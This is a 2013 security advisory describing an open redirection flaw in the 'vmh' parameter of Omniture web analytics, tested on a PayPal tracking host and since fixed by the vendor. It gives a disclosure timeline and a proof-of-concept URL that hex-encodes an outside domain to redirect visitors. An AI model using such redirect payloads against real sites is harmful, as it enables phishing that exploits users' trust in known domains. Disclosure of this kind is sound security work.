Advisory: Omniture web analytics - Open Redirection vulnerability Advisory ID: SSCHADV2013-003 Author: Stefan Schurtz Affected Software: Successfully tested on paypal.112.2o7.net Vendor URL: http://www.omniture.com/ Vendor Status: fixed ========================== Vulnerability Description ========================== The 'vmh'-Parameter in Omniture web analytics is prone to a Open Redirection vulnerability. ========================== PoC-Exploit ========================== // Redirection to darksecurity.de (Hex: %77%77%77%2E%64%61%72%6B%73%65%63%75%72%69%74%79%2E%64%65) http://paypal.112.2o7.net/b/ss/paypalglobal/1/H.24.2/s44689267192652?AQB=1&pccr=true&g=none&&vmh=%77%77%77%2E%64%61%72%6B%73%65%63%75%72%69%74%79%2E%64%65&ndh=1&vmt=51437A79&ce=UTF-8&cc=USD&v5=DE&c6=9WG20829AV167542H&c7=premier&v7=premier:verified:unrestricted&c8=verified&c9=unrestricted&c10=de&v19=premier&c20=1360528993&c26=submit.x&&c35=in&c40=a0df0db936e73&c43=log%20in&c47=D=pageName&c50=de_de&&c54=100&c56=no&s=1440x900&c=24&j=1.7&v=Y&k=Y&bw=1440&bh=675&&pid=log%20in&pidt=1&oid=Einloggen&oidt=3&ot=SUBMIT&AQE=1 ========================== Solution ========================== Fixed by vendor ========================== Disclosure Timeline ========================== 19-Feb-2013 - informed by contact form 02-Mar-2013 - vendor informed by e-mail 04-Mar-2013 - feedback from vendor 04-Mar-2013 - sent detailed information to vendor 06-Mar-2013 - feedback from Adobe PRSIRT (Adobe Product Security Incident Response Team) 29-Apr-2013 - asking about the current status 02-May-2013 - feedback from Adobe PRSIRT (Adobe Product Security Incident Response Team) ========================== Credits ========================== Vulnerability found and advisory written by Stefan Schurtz. ========================== References ========================== http://www.omniture.com/de/privacy/2o7 http://www.darksecurity.de/advisories/2013/SSCHADV2013-003.txt